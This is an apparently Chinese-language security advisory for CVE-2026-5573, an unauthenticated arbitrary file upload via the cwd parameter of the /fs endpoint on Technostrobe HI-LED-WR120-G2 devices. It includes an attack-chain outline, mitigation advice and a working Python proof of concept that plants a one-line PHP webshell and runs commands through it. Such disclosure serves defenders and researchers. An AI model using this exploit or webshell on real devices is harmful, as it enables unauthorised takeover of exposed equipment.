IPBUF安全漏洞报告
English
CVE-2026-5573 CVSS 7.3 高危

CVE-2026-5573 Technostrobe HI-LED任意文件上传漏洞

披露日期: 2026-04-05

漏洞信息

漏洞编号
CVE-2026-5573
漏洞类型
任意文件上传
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Technostrobe HI-LED-WR120-G2

相关标签

文件上传IoTTechnostrobeRCEPath Traversal高危漏洞

漏洞概述

Technostrobe HI-LED-WR120-G2 设备被发现存在严重的安全漏洞。该问题出在 /fs 接口处理文件上传时存在缺陷,具体涉及对 cwd 参数的不安全处理。远程攻击者无需经过身份认证即可利用此漏洞,通过构造特定的恶意请求参数,绕过系统限制,实现不受限制的文件上传。鉴于利用代码已被公开披露,且厂商并未及时响应,该漏洞极易被用于发起自动化攻击,对设备的数据机密性、完整性和服务可用性造成严重影响。

技术细节

该漏洞的核心在于 Technostrobe HI-LED-WR120-G2 固件中 /fs 端点对路径参数的验证缺失。当处理文件上传请求时,程序直接使用用户可控的 cwd 参数作为文件的存储路径,未对路径进行合法性校验或目录遍历检查。这使得攻击者能够通过发送包含恶意 cwd 值(如 ../../ 或绝对路径)的 POST 请求,将恶意文件(如 Web Shell、脚本文件)上传到系统的敏感目录(如 Web 根目录)。由于 CVSS 评分为 7.3(高危),且攻击无需用户交互(UI:N)和权限(PR:N),攻击者可轻易地在受害者服务器上执行任意代码,完全控制受影响设备。

攻击链分析

STEP 1
侦察
攻击者通过端口扫描或网络测绘发现暴露在互联网上的 Technostrobe HI-LED-WR120-G2 设备。
STEP 2
漏洞利用
攻击者向目标设备的 /fs 接口发送特制的 HTTP POST 请求,在请求中包含恶意文件并利用 cwd 参数指定上传路径。
STEP 3
文件上传
由于缺乏路径验证,设备将恶意文件(如 Webshell)保存到攻击者指定的 Web 目录中。
STEP 4
执行与控制
攻击者通过浏览器访问上传的恶意文件,在服务器端执行任意系统命令,获取设备控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://<target-ip>/fs" # Malicious file to upload (e.g., PHP webshell) files = { 'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream') } # Exploiting the 'cwd' parameter to change upload directory data = { 'cwd': '/var/www/html/' # Target directory for unrestricted upload } try: response = requests.post(target_url, files=files, data=data) if response.status_code == 200: print("[+] Exploit successful! File uploaded.") print("[+] Check your webshell at: http://<target-ip>/shell.php?cmd=whoami") else: print("[-] Exploit failed. Status code:", response.status_code) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30

防御指南

临时缓解措施
由于厂商尚未发布补丁,建议立即将设备管理后台置于防火墙之后,禁止从公网直接访问。如非必要,可暂时关闭设备的 Web 管理服务或文件上传功能。管理员应密切监控设备日志,查找针对 /fs 路径的可疑 POST 请求活动。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表